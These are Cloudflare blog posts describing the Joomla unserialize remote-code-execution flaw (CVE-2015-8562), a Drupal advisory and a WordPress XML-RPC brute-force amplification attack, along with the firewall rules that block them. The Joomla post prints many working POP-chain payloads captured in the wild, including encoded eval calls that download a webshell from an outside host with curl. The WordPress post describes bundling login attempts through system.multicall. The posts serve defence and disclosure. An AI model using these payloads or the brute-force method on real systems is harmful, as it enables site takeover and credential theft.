The Cloudflare Blog

Cloudflare is adding Drupal WAF Rule to Mitigate Critical Drupal Exploit

Pasha Kravtsov — Thu, 29 Mar 2018 04:10:38 GMT

Drupal has recently announced an update to fix a critical remote code execution exploit (SA-CORE-2018-002/CVE-2018-7600). In response we have just pushed out a rule to block requests matching these exploit conditions for our Web Application Firewall (WAF). You can find this rule in the Cloudflare ruleset in your dashboard under the Drupal category with the rule ID of D0003.

Drupal Advisory: https://www.drupal.org/sa-core-2018-002

A Different Kind of POP: The Joomla Unserialize Vulnerability

Pasha Kravtsov — Thu, 17 Dec 2015 18:05:00 GMT

At CloudFlare, we spend a lot of time talking about the PoPs (Points of Presence) we have around the globe, however, on December 14th, another kind of POP came to the world: a vulnerability being exploited in the wild against Joomla’s Content Management System. This is known as a zero day attack, where it has been zero days since a patch has been released for that bug. A CVE ID has been issued for this particular vulnerability as CVE-2015-8562. Jaime Cochran and I decided to take a closer look.

In this blog post we’ll explain what the vulnerability is, give examples of actual attack payloads we’ve seen, and show how CloudFlare automatically protects Joomla users. If you are using Joomla with CloudFlare today and have our WAF enabled, you are already protected.

The Joomla Web Application Firewall rule set is enabled by default for CloudFlare customers with a Pro or higher plan, which blocks this attack. You can find it in the Joomla section of the CloudFlare Rule Set in the WAF Dashboard.

What is Joomla?

Joomla is an open source Content Management System which allows you to build web applications and control every aspect of the content of your website. Some of these resources include photos, videos, text, and documents to name just a few. As one can imagine, this is a high value target if an attacker can gain access to the admin control panel.

The Unserialize Vulnerability

The vulnerability is a bug class that is inherent in most languages including Java, Python’s pickle, C’s unmarshalling, Ruby (CVE-2013-0333), and many others. This class of vulnerability is not new but has recently piqued the security world’s interest after an excellent blog written by @breenmachine was published. Like many vulnerabilities in CMS/framework software, remote code execution is achieved, meaning a usually unauthenticated attacker can execute arbitrary code from afar, leading to the acquisition of sensitive information, a shell, and eventually a full system compromise.

So how is remote code execution achieved? There are two poorly sanitized inputs that can be controlled by a user, one being the User-Agent header and the other being the X-Forwarded-For header, which are then stored as part of the session.client.browser and session.client.forwarded objects, serialized, and inserted in Joomla’s MySQL database.

These request headers must contain malicious data known as a "POP Chain" (Property Oriented Programming). POP chains, similar to their older cousin ROP (Return Oriented Programming) are constructed of a series of “magic PHP methods” that already exist in the code, which is why these kinds of attacks are often referred to as code reuse. An attacker must link these methods together in order to achieve their desired code execution.

The POP chain is then sent from the attacker in either the User-Agent or X-Forwarded-For header, the attacker saves the session cookie that is returned upon completion of the request. From what we have noticed, most of these POP chains run eval() on the POST data, but not all of them, as you can also run a chr() encoded string into eval() that will execute all the bad PHP calls: system(), popen(), exec(), passthru(), shell_exec(), etc. Here is an example of part of the exploit payload:

eval(base64_decode($_POST[111]))

Now, you may be wondering how this is exploited if the initial request isn’t a POST request. That is the next part of the exploit, after grabbing the session cookie value, the attacker sends a subsequent request with the session cookie set. The previous request’s User-Agent or X-Forwarded-For header was inserted into the MySQL database and is unserialized on the subsequent request. The trick is appending four UTF-8 characters to the end of the payload (such as: \xf0\xfd\xfd\xfd) which will truncate the payload, allowing the code to execute. Crafting a successful payload also involves calculating the size of the payload and inserting it before the eval() as such:

s:221:"eval(base64_decode($_POST[111]))

or the exploit will fail. We have been able to successfully exploit both the vulnerable headers, using multiple variations of POP chains in our test environment.

More importantly, we’ve been able to block them too.

The Vulnerable Code

In this section, we’ll go through the code path taken to exploit this vulnerability starting with session.php, where sessions are created. If you look at lines 909 and 932, you will see that the unsanitized User-Agent and X-Forwarded-For headers are set to session.client.browser and session.client.forwarded.

909: if (isset($_SERVER['HTTP_X_FORWARDED_FOR']))
910: {
911:        $this->set('session.client.forwarded', $_SERVER['HTTP_X_FORWARDED_FOR']);
912: }
					

<-->

932: if (in_array('fix_browser', $this->_security) && isset($_SERVER['HTTP_USER_AGENT']))
933: {
934:			$browser = $this->get('session.client.browser');
935:       if ($browser === null)
936:       {
937:	 		$this->set('session.client.browser', $_SERVER['HTTP_USER_AGENT']);
938:       }

PHP has a unique way of handling sessions, which actually serializes and deserializes session objects: PHP’s session handler object is created and saved here:

public function write($id, $data)

{

	try

	{

		$query = $this->db->getQuery(true);

		$query->update($this->db->quoteName('#__session'))

		->set($this->db->quoteName('data') . ' = ' . $this->db->quote($data))

		->set($this->db->quoteName('time') . ' = ' . $this->db->quote((int) time()))

		->where($this->db->quoteName('session_id') . ' = ' . $this->db->quote($id));

		// Try to update the session data in the database table.

		$this->db->setQuery($query);

		if (!$this->db->execute())

		{

			return false;

		}

		// Since $this->db->execute did not throw an exception the query was successful.

		// Either the data changed, or the data was identical. In either case we are done.

		return true;

	}

	catch (\Exception $e)

	{

		return false;

	}

}

and then popped from the database here:

public function read($id)
	  {
		  // Get the database connection object and verify its connected.
		  $db = JFactory::getDbo();
		  try
		  {
			  // Get the session data from the database table.
			  $query = $db->getQuery(true)
				  ->select($db->quoteName('data'))
			  ->from($db->quoteName('#__session'))
			  ->where($db->quoteName('session_id') . ' = ' . $db->quote($id));
			  $db->setQuery($query);
			  $result = (string) $db->loadResult();
			  $result = str_replace('\0\0\0', chr(0) . '*' . chr(0), $result);
			  return $result;
		  }
		  catch (Exception $e)
		  {
			  return false;
		  }
	  }

As per the PHP documentation: "The value returned will be unserialized automatically by PHP and used to populate the $_SESSION superglobal." So the session_id is pulled from the database, unserialized, and if the POP chain was constructed correctly, it will execute the malicious code.

What we see with our Web Application Firewall

After writing a ruleset specifically to block this attack and making it block by default for all our customers, we saw a very large number of requests that triggered the ruleset. This shows malicious actors trying to directly exploit Joomla installs:

As you can see, the amount of requests that have been blocked spike greatly when public exploits were released. Here is a small sample of the different payloads we’re seeing since public exploits were released a day ago:

[ Payload ]:   123}__test|O:21:"JDatabaseDriverMysqli":3:{s:4:"\0\0\0a";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:6:"assert";s:10:"javascript";i:9999;s:8:"feed_url";s:221:"eval(base64_decode('ellyel8'));phpinfo();JFactory::getConfig();exit;";}i:1;s:4:"init";}}s:13:"\0\0\0connection";i:1;}?



 [ Payload ]:   123}__test|O:21:"JDatabaseDriverMysqli":3:{s:4:"\0\0\0a";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:6:"assert";s:10:"javascript";i:9999;s:8:"feed_url";s:221:"eval(base64_decode('ZmlsZV9wdXRfY29udGVudHMoZGlybmFtZSgkX1NFUlZFUlsnU0NSSVBUX0ZJTEVOQU1FJ10pLicvbGlicmFyaWVzL29uZV93b3JkLnBocCcsICc8P3BocCBldmFsKCRfUE9TVFtcJ2plcnJ5NDZcJ10pOz8+Jyk7'));phpinfo();JFactory::getConfig();exit;";}i:1;s:4:"init";}}s:13:"\0\0\0connection";i:1;}?


 [ Payload ]:   123}__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:60:"eval(base64_decode($_POST[111]));JFactory::getConfig();exit;";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}?


[ Payload ]:   123}__test|O:21:"JDatabaseDriverMysqli":3:{s:4:"\0\0\0a";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:6:"assert";s:10:"javascript";i:9999;s:8:"feed_url";s:221:"eval(base64_decode('ZmlsZV9wdXRfY29udGVudHMoZGlybmFtZSgkX1NFUlZFUlsnU0NSSVBUX0ZJTEVOQU1FJ10pLicvbGlicmFyaWVzL29uZV93b3JkLnBocCcsICc8P3BocCBldmFsKCRfUE9TVFtcJ2plcnJ5NDZcJ10pOz8+Jyk7'));phpinfo();JFactory::getConfig();exit;";}i:1;s:4:"init";}}s:13:"\0\0\0connection";i:1;}?

 [ Payload ]:   123}__test|O:21:"JDatabaseDriverMysqli":3:{s:4:"\0\0\0a";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:6:"assert";s:10:"javascript";i:9999;s:8:"feed_url";s:221:"eval(base64_decode('ZmlsZV9wdXRfY29udGVudHMoZGlybmFtZSgkX1NFUlZFUlsnU0NSSVBUX0ZJTEVOQU1FJ10pLicvbGlicmFyaWVzL29uZV93b3JkLnBocCcsICc8P3BocCBldmFsKCRfUE9TVFtcJ2plcnJ5NDZcJ10pOz8+Jyk7'));phpinfo();JFactory::getConfig();exit;";}i:1;s:4:"init";}}s:13:"\0\0\0connection";i:1;}?

 [ Payload ]:   123}__test|O:21:"JDatabaseDriverMysqli":3:{s:4:"\0\0\0a";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:6:"assert";s:10:"javascript";i:9999;s:8:"feed_url";s:221:"eval(base64_decode('ZmlsZV9wdXRfY29udGVudHMoZGlybmFtZSgkX1NFUlZFUlsnU0NSSVBUX0ZJTEVOQU1FJ10pLicvbGlicmFyaWVzL29uZV93b3JkLnBocCcsICc8P3BocCBldmFsKCRfUE9TVFtcJ2plcnJ5NDZcJ10pOz8+Jyk7'));phpinfo();JFactory::getConfig();exit;";}i:1;s:4:"init";}}s:13:"\0\0\0connection";i:1;}?

 [ Payload ]:   }__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:60:"eval(base64_decode($_POST[111]));JFactory::getConfig();exit;";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}?

 [ Payload ]:   123}__test|O:21:"JDatabaseDriverMysqli":3:{s:4:"\0\0\0a";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:6:"assert";s:10:"javascript";i:9999;s:8:"feed_url";s:221:"eval(base64_decode('ZmlsZV9wdXRfY29udGVudHMoZGlybmFtZSgkX1NFUlZFUlsnU0NSSVBUX0ZJTEVOQU1FJ10pLicvbGlicmFyaWVzL29uZV93b3JkLnBocCcsICc8P3BocCBldmFsKCRfUE9TVFtcJ2plcnJ5NDZcJ10pOz8+Jyk7'));phpinfo();JFactory::getConfig();exit;";}i:1;s:4:"init";}}s:13:"\0\0\0connection";i:1;}?


 [ Payload ]:   123}__test|O:21:"JDatabaseDriverMysqli":3:{s:4:"\0\0\0a";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:6:"assert";s:10:"javascript";i:9999;s:8:"feed_url";s:221:"eval(base64_decode('ZmlsZV9wdXRfY29udGVudHMoZGlybmFtZSgkX1NFUlZFUlsnU0NSSVBUX0ZJTEVOQU1FJ10pLicvbGlicmFyaWVzL29uZV93b3JkLnBocCcsICc8P3BocCBldmFsKCRfUE9TVFtcJ2plcnJ5NDZcJ10pOz8+Jyk7'));phpinfo();JFactory::getConfig();exit;";}i:1;s:4:"init";}}s:13:"\0\0\0connection";i:1;}?

 [ Payload ]:   }__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:954:"eval(chr(115).chr(121).chr(115).chr(116).chr(101).chr(109).chr(40).chr(39).chr(99).chr(100).chr(32).chr(99).chr(111).chr(109).chr(112).chr(111).chr(110).chr(101).chr(110).chr(116).chr(115).chr(59).chr(99).chr(100).chr(32).chr(99).chr(111).chr(109).chr(95).chr(109).chr(101).chr(100).chr(105).chr(97).chr(59).chr(114).chr(109).chr(32).chr(45).chr(114).chr(102).chr(32).chr(107).chr(46).chr(116).chr(120).chr(116).chr(59).chr(99).chr(117).chr(114).chr(108).chr(32).chr(45).chr(79).chr(32).chr(104).chr(116).chr(116).chr(112).chr(58).chr(47).chr(47).chr(116).chr(105).chr(112).chr(116).chr(111).chr(112).chr(99).chr(111).chr(109).chr(46).chr(116).chr(118).chr(47).chr(98).chr(108).chr(111).chr(103).chr(47).chr(107).chr(46).chr(116).chr(120).chr(116).chr(59).chr(109).chr(118).chr(32).chr(107).chr(46).chr(116).chr(120).chr(116).chr(32).chr(97).chr(106).chr(97).chr(120).chr(46).chr(112).chr(104).chr(112).chr(39).chr(41).chr(59));JFactory::getConfig();exit";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}

 [ Payload ]:   }__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:954:"eval(chr(115).chr(121).chr(115).chr(116).chr(101).chr(109).chr(40).chr(39).chr(99).chr(100).chr(32).chr(99).chr(111).chr(109).chr(112).chr(111).chr(110).chr(101).chr(110).chr(116).chr(115).chr(59).chr(99).chr(100).chr(32).chr(99).chr(111).chr(109).chr(95).chr(109).chr(101).chr(100).chr(105).chr(97).chr(59).chr(114).chr(109).chr(32).chr(45).chr(114).chr(102).chr(32).chr(107).chr(46).chr(116).chr(120).chr(116).chr(59).chr(99).chr(117).chr(114).chr(108).chr(32).chr(45).chr(79).chr(32).chr(104).chr(116).chr(116).chr(112).chr(58).chr(47).chr(47).chr(116).chr(105).chr(112).chr(116).chr(111).chr(112).chr(99).chr(111).chr(109).chr(46).chr(116).chr(118).chr(47).chr(98).chr(108).chr(111).chr(103).chr(47).chr(107).chr(46).chr(116).chr(120).chr(116).chr(59).chr(109).chr(118).chr(32).chr(107).chr(46).chr(116).chr(120).chr(116).chr(32).chr(97).chr(106).chr(97).chr(120).chr(46).chr(112).chr(104).chr(112).chr(39).chr(41).chr(59));JFactory::getConfig();exit";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}

 [ Payload ]:   sjeua}__eusmxa|O:21:"JDatabaseDriverMysqli":3:{s:4:"\0\0\0a";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:61:"eval(base64_decode($_POST[1111]));JFactory::getConfig();exit;";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}

 [ Payload ]:   sjeua}__eusmxa|O:21:"JDatabaseDriverMysqli":3:{s:4:"\0\0\0a";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:61:"eval(base64_decode($_POST[1111]));JFactory::getConfig();exit;";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}


 [ Payload ]:   123}__test|O:21:"JDatabaseDriverMysqli":3:{s:4:"\0\0\0a";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:6:"assert";s:10:"javascript";i:9999;s:8:"feed_url";s:221:"eval(base64_decode('ZmlsZV9wdXRfY29udGVudHMoZGlybmFtZSgkX1NFUlZFUlsnU0NSSVBUX0ZJTEVOQU1FJ10pLicvbGlicmFyaWVzL29uZV93b3JkLnBocCcsICc8P3BocCBldmFsKCRfUE9TVFtcJ2plcnJ5NDZcJ10pOz8+Jyk7'));phpinfo();JFactory::getConfig();exit;";}i:1;s:4:"init";}}s:13:"\0\0\0connection";i:1;}?


 [ Payload ]:   123}__test|O:21:"JDatabaseDriverMysqli":3:{s:4:"\0\0\0a";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:6:"assert";s:10:"javascript";i:9999;s:8:"feed_url";s:221:"eval(base64_decode('ZmlsZV9wdXRfY29udGVudHMoZGlybmFtZSgkX1NFUlZFUlsnU0NSSVBUX0ZJTEVOQU1FJ10pLicvbGlicmFyaWVzL29uZV93b3JkLnBocCcsICc8P3BocCBldmFsKCRfUE9TVFtcJ2plcnJ5NDZcJ10pOz8+Jyk7'));phpinfo();JFactory::getConfig();exit;";}i:1;s:4:"init";}}s:13:"\0\0\0connection";i:1;}?

 [ Payload ]:   }__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:59:"eval(base64_decode($_POST[200]));JFactory::getConfig();exit";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"cache_class";O:20:"JDatabaseDriverMysql":0:{}}i:1;s:4:"init";}}s:13:"\0\0\0connection";b:1;}?

As you can see, there are a few different payloads being used. Specifically, the payloads using chr() in eval() are from the public exploit released on PasteBin yesterday, December 15th, along with a metasploit module. Some payloads translate to:

system('cd components;cd com_media;rm -rf k.txt;curl -O http://tiptopcom.tv/blog/k.txt;mv k.txt ajax.php');

This is a simple example where an attacker tries to find a writable directory, retrieves a malicious file from a remote (most likely a compromised computer) and disguises it as a seemingly innocuous PHP file. The file is known as a webshell and gives the attacker a way to easily execute code and a very small amount of persistence. But, this is only a very basic example of what an attacker might do.

We have found some payloads that classically extract credentials from the Joomla configuration file or attempt to spawn a connectback shell, which is a technique that makes the target computer send an outbound connection to an attacker controlled computer, allowing them to operate as if they had terminal access to the computer. This is often used when a target does not have an attacker-friendly environment (such as properly jailed user accounts and read-only directories). The original zero day was using a webshell dropping payload that cleverly patched the User-Agent bug behind itself.

Since the first public exploit was released, our WAF has blocked 16,413 attacks and counting.

A Look at the New WordPress Brute Force Amplification Attack

Pasha Kravtsov — Fri, 16 Oct 2015 17:14:32 GMT

Recently, a new brute force attack method for WordPress instances was identified by Sucuri. This latest technique allows attackers to try a large number of WordPress username and password login combinations in a single HTTP request.

The vulnerability can easily be abused by a simple script to try a significant number of username and password combinations with a relatively small number of HTTP requests. The following diagram shows a 4-fold increase in login attempts to HTTP requests, but this can trivially be expanded to a thousand logins.

This form of brute force attack is harder to detect, since you won’t necessarily see a flood of requests. Fortunately, all CloudFlare paid customers have the option to enable a Web Application Firewall ruleset to stop this new attack method.

What is XML-RPC?

To understand the vulnerability, it’s important to understand the basics of the XML remote procedure protocol (XML-RPC).

XML-RPC uses XML encoding over HTTP to provide a remote procedure call protocol. It’s commonly used to execute various functions in a WordPress instance for APIs and other automated tasks. Requests that modify, manipulate, or view data using XML-RPC require user credentials with sufficient permissions.

Here is an example that requests a list of the user’s blogs:



wp.getUsersBlogs

 
  
   admin
  
 
 
  
   password123

The server responds with an XML message containing the requested information. The isAdmin name-value pair tells us our credentials were correct:




	
	  
	  
	  
	  
		isAdmin
		1
	  
	  
		url
		http://example.com/
	  
	  
		blogid
		1
	  
	  
		blogName
		testing
	  
	  
		xmlrpc
		http://example.com/xmlrpc.php

As shown in this request, you must provide proper authentication to get a successful response. You can, in theory, create a script that tries different combinations of the username and password, but that is a noisy option that isn’t very effective and is easily detected (the server logs would show a flood of failed login attempts).

This is where the system.multicall functionality comes into play. You can run multiple methods with a single HTTP request. This is useful for mass editing blogs or deleting large numbers of comments, etc. Any method that requires authentication can be abused to brute force credentials. Here is what a sample XML system.multicall payload would look like:



system.multicall

  
  
  
	methodName
	wp.getUsersBlogs
  
  
	params
	
	admin
	password
	
	
  
  
  
  
	methodName
	wp.getUsersBlogs
  
  
	params
	
	
	  admin
	  password

As you can see, this can lead to very obvious abuse.

Exploitation

During testing, I was able to call the method wp.getUserBlogs 1,000 times in a single HTTP request (limited only by PHP memory issues). If a user creates a simple shell loop that executes one thousand times and runs a PHP script that crafts an HTTP request with one thousand method calls all requiring authentication, then that user would be able to try one million unique logins in a very short period of time.

This makes brute forcing the login very fast and can run down a pretty large wordlist in a short period of time. Also note that the wp.getUserBlogs method isn’t the only RPC call requiring authentication. It’s possible to use any RPC method which requires authentication to attempt logins and brute force the Wordpress credentials.

CloudFlare Customers Are Protected

When using CloudFlare with a Pro level plan or higher, you have the ability to turn on the Web Application Firewall (WAF) and take advantage of the new WordPress ruleset I created to mitigate this attack—all without any major interaction or supervision on your end.

Our WAF works by checking HTTP requests for consistencies that line up with known attacks and malicious activities. If a request does appear to be malicious, we drop it at the edge so it never even reaches the customer’s origin server.

To enable the rule, navigate to your CloudFlare Firewall dashboard, and reference the rule named "Blocks amplified brute force attempts to xmlrpc.php" with the rule ID WP0018.

That’s all there is to it. Now you are protected from the new WordPress XML-RPC brute force amplification attack.

The Manual Solution

Another way to mitigate this attack is by disabling the ability to call thesystem.multicall method in your Wordpress installation by editing yourfunctions.php file. Adding the function mmx_remove_xmlrpc_methods() will alleviate the problem, like so:

function mmx_remove_xmlrpc_methods( $methods ) {
	unset( $methods['system.multicall'] );
	return $methods;
}
add_filter( 'xmlrpc_methods', 'mmx_remove_xmlrpc_methods');

Final Thoughts

XML-RPC can be a useful tool for making changes to WordPress and other web applications; however, improper implementation of certain features can result in unintended consequences. Default-on methods like system.multicall and pingback.ping (we have a WAF rule for that one, too) are just a few examples of possible exploits.

Properly configuring the CloudFlare Web Application Firewall for your Internet facing properties will protect you from such attacks with no changes to your server configuration.